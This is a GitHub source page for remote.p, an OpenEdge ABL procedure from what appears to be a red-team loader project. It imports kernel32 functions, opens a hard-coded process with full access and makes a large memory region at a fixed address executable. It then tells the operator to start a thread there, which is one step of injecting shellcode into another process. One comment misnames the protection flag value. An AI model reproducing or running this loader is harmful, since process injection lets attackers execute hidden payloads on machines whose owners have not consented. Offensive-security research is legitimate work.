OpenEdgeABL-Loader/remote.p at main · AlmondOffSec/OpenEdgeABL-Loader · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
DEFINE VARIABLE dwProcessId AS INTEGER NO-UNDO.
DEFINE VARIABLE hProcess AS INT64 NO-UNDO.
DEFINE VARIABLE bSuccess AS INTEGER NO-UNDO.
DEFINE VARIABLE pRemoteAddress AS INT64 NO-UNDO.
DEFINE VARIABLE dwScSz AS INT64 NO-UNDO.
DEFINE VARIABLE flOldProtect AS INTEGER NO-UNDO.

PROCEDURE OpenProcess EXTERNAL "kernel32.dll":
    DEFINE INPUT PARAMETER dwDesiredAccess AS UNSIGNED-LONG.
    DEFINE INPUT PARAMETER bInheritHandle AS UNSIGNED-LONG.
    DEFINE INPUT PARAMETER dwProcessId AS UNSIGNED-LONG.
    DEFINE RETURN PARAMETER hProcess AS INT64.
END.
PROCEDURE CloseHandle EXTERNAL "kernel32.dll":
    DEFINE INPUT PARAMETER hProcess AS INT64.
    DEFINE RETURN PARAMETER bSuccess AS UNSIGNED-LONG.
END.
PROCEDURE VirtualProtectEx EXTERNAL "kernel32.dll":
    DEFINE INPUT PARAMETER hProcess AS INT64.
    DEFINE INPUT PARAMETER lpAddress AS INT64.
    DEFINE INPUT PARAMETER dwSize AS INT64.
    DEFINE INPUT PARAMETER flNewProtect AS UNSIGNED-LONG.
    DEFINE INPUT-OUTPUT PARAMETER pflOldProtect AS HANDLE TO UNSIGNED-LONG.
    DEFINE RETURN PARAMETER bSuccess AS UNSIGNED-LONG.
END.
PROCEDURE GetLastError EXTERNAL "kernel32.dll":
    DEFINE RETURN PARAMETER dwLastError AS UNSIGNED-LONG.
END.

ASSIGN dwScSz = 9851990.
ASSIGN dwProcessId = 5492.
ASSIGN pRemoteAddress = 1456588816448.

// 2035711 = PROCESS_ALL_ACCESS
RUN OpenProcess(INPUT 2035711, INPUT 0, INPUT dwProcessId, OUTPUT hProcess).
MESSAGE "Handle: " hProcess.

// 64 = PAGE_EXECUTE_READ
RUN VirtualProtectEx(INPUT hProcess, INPUT pRemoteAddress, INPUT dwScSz, INPUT 64, INPUT-OUTPUT flOldProtect, OUTPUT bSuccess).
MESSAGE "Result of protect: " bSuccess.

RUN CloseHandle(INPUT hProcess, OUTPUT bSuccess).
MESSAGE "Result of close: " bSuccess.

PAUSE MESSAGE "Protection changed, you can CreateThread now".